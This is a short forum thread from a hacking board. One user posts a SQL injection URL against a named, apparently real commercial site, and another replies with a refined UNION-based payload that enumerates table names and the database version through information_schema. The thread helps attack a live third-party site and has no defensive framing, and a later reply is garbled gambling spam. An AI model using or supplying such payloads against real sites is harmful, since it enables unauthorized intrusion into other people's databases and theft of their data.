Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
can get the db name but not the version 0_o
Posted by: kenjii
Date: November 19, 2013 03:42PM

hi all

i have found a link vulnerable to sql :
http://www.tonixcomp.net/productDetail.php?Product_ID=-1706+/*!UNION*/+/*!SELECT*/+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+-

i can get the database name, but not the version or get table etc...

can you tell me what's wrong?

Options: ReplyQuote
Re: can get the db name but not the version 0_o
Posted by: firestorm
Date: November 20, 2013 06:54AM

Nothing...

http://www.tonixcomp.net/productDetail.php?Product_ID=-1706+/*!UNION*/+/*!SELECT*/+1,(group_concat(/*!table_name*/)),3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+-

Options: ReplyQuote
Re: can get the db name but not the version 0_o
Posted by: kenjii
Date: November 20, 2013 07:54AM

well thank you !

Options: ReplyQuote
Re: can get the db name but not the version 0_o
Posted by: pridsr4
Date: December 03, 2013 04:32AM

Thank you for the great offer.

????????????????????? sbobet ??????????? ????????????????????????????? sbobet ???????

Options: ReplyQuote


Sorry, only registered users may post in this forum.